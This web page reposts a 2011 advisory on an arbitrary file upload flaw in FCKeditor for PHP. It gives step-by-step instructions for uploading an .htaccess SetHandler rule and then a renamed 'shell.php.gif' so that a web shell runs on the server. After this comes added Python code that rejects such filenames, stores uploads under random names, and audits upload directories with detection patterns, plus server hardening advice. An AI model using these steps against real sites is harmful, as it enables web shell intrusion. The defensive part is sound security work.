FCKeditor Upload Vulnerability in All PHP Versions
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>
2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now the shell is available on the server.
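The technique above only works because three things line up: the upload handler stores an attacker-chosen name, that name survives as a dotfile (.htaccess) or with a "php" token before a benign extension, and Apache honours per-directory overrides in the upload tree. As an added defensive example (not part of the original advisory and not FCKeditor's own code), the following Python rejects such names at upload time, stores files under a server-generated name, and audits an existing upload directory listing for the artefacts this method leaves behind. The function names, the extension whitelist and the sample listing are my own assumptions, constructed for the example.

```python
"""Upload-name policy and upload-directory audit (added example).

Assumptions (not from the advisory): uploads are images only, the
stored name is generated server-side, and the audit runs over a plain
list of basenames from the upload directory. SAMPLE_LISTING is constructed.
"""
import os
import re
import secrets
from typing import Iterable, List, Tuple

ALLOWED_EXT = {"gif", "jpg", "jpeg", "png"}

# Tokens that must never appear as a dot/underscore/dash-delimited part of a
# stored name: an uploaded .htaccess (SetHandler) or mod_mime multi-extension
# handling can turn any of them into executable code.
FORBIDDEN_TOKENS = re.compile(
    r"(^|[._-])(php\d*|phtml|phar|htaccess|htpasswd)($|[._-])", re.I
)


def validate_upload_name(name: str) -> Tuple[bool, str]:
    """Check the client-supplied filename. Returns (accepted, reason)."""
    base = os.path.basename(name.replace("\\", "/"))
    if base != name:
        return False, "path separators not allowed"
    if base.startswith("."):
        return False, "dotfile (e.g. .htaccess) rejected"
    parts = base.lower().split(".")
    if len(parts) != 2:
        # Blocks both 'htaccess' (no extension) and 'shell.php.gif'.
        return False, "exactly one extension required"
    _stem, ext = parts
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not in whitelist"
    if FORBIDDEN_TOKENS.search(base):
        # Catches 'shell_php.gif', the renamed form the advisory relies on.
        return False, "script/handler token in name"
    return True, "ok"


def stored_name(client_name: str) -> str:
    """Never write the client's name to disk: keep only the whitelisted
    extension and prefix it with a random hex token."""
    ok, reason = validate_upload_name(client_name)
    if not ok:
        raise ValueError(reason)
    ext = client_name.rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


# Indicators of the technique on an already-populated upload directory.
SUSPICIOUS = [
    (re.compile(r"^\.ht"), "Apache override file in upload dir"),
    (re.compile(r"[._-]php\d*\.", re.I), "php token before a benign extension"),
    (re.compile(r"\.php\d*$", re.I), "php file in upload dir"),
    (re.compile(r"\.(phtml|phar)$", re.I), "alternative php extension"),
]


def audit_upload_names(names: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (name, reason) for every listing entry matching an indicator
    (first matching indicator only, one finding per name)."""
    findings = []
    for n in names:
        for pat, why in SUSPICIOUS:
            if pat.search(n):
                findings.append((n, why))
                break
    return findings


# Constructed sample directory listing for the audit (not real data).
SAMPLE_LISTING = [".htaccess", "shell_php.gif", "holiday.jpg", "logo.png", "x.php.gif"]

if __name__ == "__main__":
    for candidate in ["photo.gif", "shell.php.gif", "shell_php.gif", ".htaccess"]:
        print(candidate, validate_upload_name(candidate))
    print("stored as:", stored_name("photo.GIF"))
    for name, why in audit_upload_names(SAMPLE_LISTING):
        print("FINDING:", name, "-", why)
```

The name checks are a second line of defence, not the fix. The decisive mitigation for this advisory is on the web server: set `AllowOverride None` for the upload tree so an uploaded .htaccess is ignored, and remove or disable the PHP handler for that directory so that no name, however renamed, is executed.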